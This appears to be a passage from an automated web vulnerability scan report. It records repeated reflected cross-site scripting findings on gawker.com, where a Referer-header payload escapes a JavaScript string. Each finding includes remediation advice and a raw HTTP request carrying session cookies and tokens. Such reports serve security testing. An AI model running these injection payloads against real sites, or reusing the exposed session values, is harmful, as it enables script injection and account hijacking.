SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; Referer: http://www.google.com/search?hl=en&q=bcf26"%3balert(1)//5266f32fbab
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bc91"%3balert(1)//1d7a6dc33d4 was submitted in the Referer HTTP header. This input was echoed as 5bc91";alert(1)//1d7a6dc33d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5710674/dont-ask-dont-tell-repeal-is-dead HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; Referer: http://www.google.com/search?hl=en&q=5bc91"%3balert(1)//1d7a6dc33d4
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92797"%3balert(1)//6accc496ff2 was submitted in the Referer HTTP header. This input was echoed as 92797";alert(1)//6accc496ff2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5710961/ivy-league-professor-charged-with-incest HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; Referer: http://www.google.com/search?hl=en&q=92797"%3balert(1)//6accc496ff2
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60ebd"%3balert(1)//b5a25b89a42 was submitted in the Referer HTTP header. This input was echoed as 60ebd";alert(1)//b5a25b89a42 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5711335/real-housewives-of-beverly-hills--the-chicken-fight HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; Referer: http://www.google.com/search?hl=en&q=60ebd"%3balert(1)//b5a25b89a42
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54aad"%3balert(1)//58ea4169a51 was submitted in the Referer HTTP header. This input was echoed as 54aad";alert(1)//58ea4169a51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5711497/gawker-dating-a-few-tips-to-help-you-search-for-love HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; Referer: http://www.google.com/search?hl=en&q=54aad"%3balert(1)//58ea4169a51
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47a6b"%3balert(1)//77c52c953d9 was submitted in the Referer HTTP header. This input was echoed as 47a6b";alert(1)//77c52c953d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5712623/julian-assange-boasted-about-asian-teengirl-stalkers-in-online-dating-profile HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; Referer: http://www.google.com/search?hl=en&q=47a6b"%3balert(1)//77c52c953d9
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34467"%3balert(1)//c1a19b370fe was submitted in the Referer HTTP header. This input was echoed as 34467";alert(1)//c1a19b370fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5713056/gawker-security-breach-were-here-to-help HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; Referer: http://www.google.com/search?hl=en&q=34467"%3balert(1)//c1a19b370fe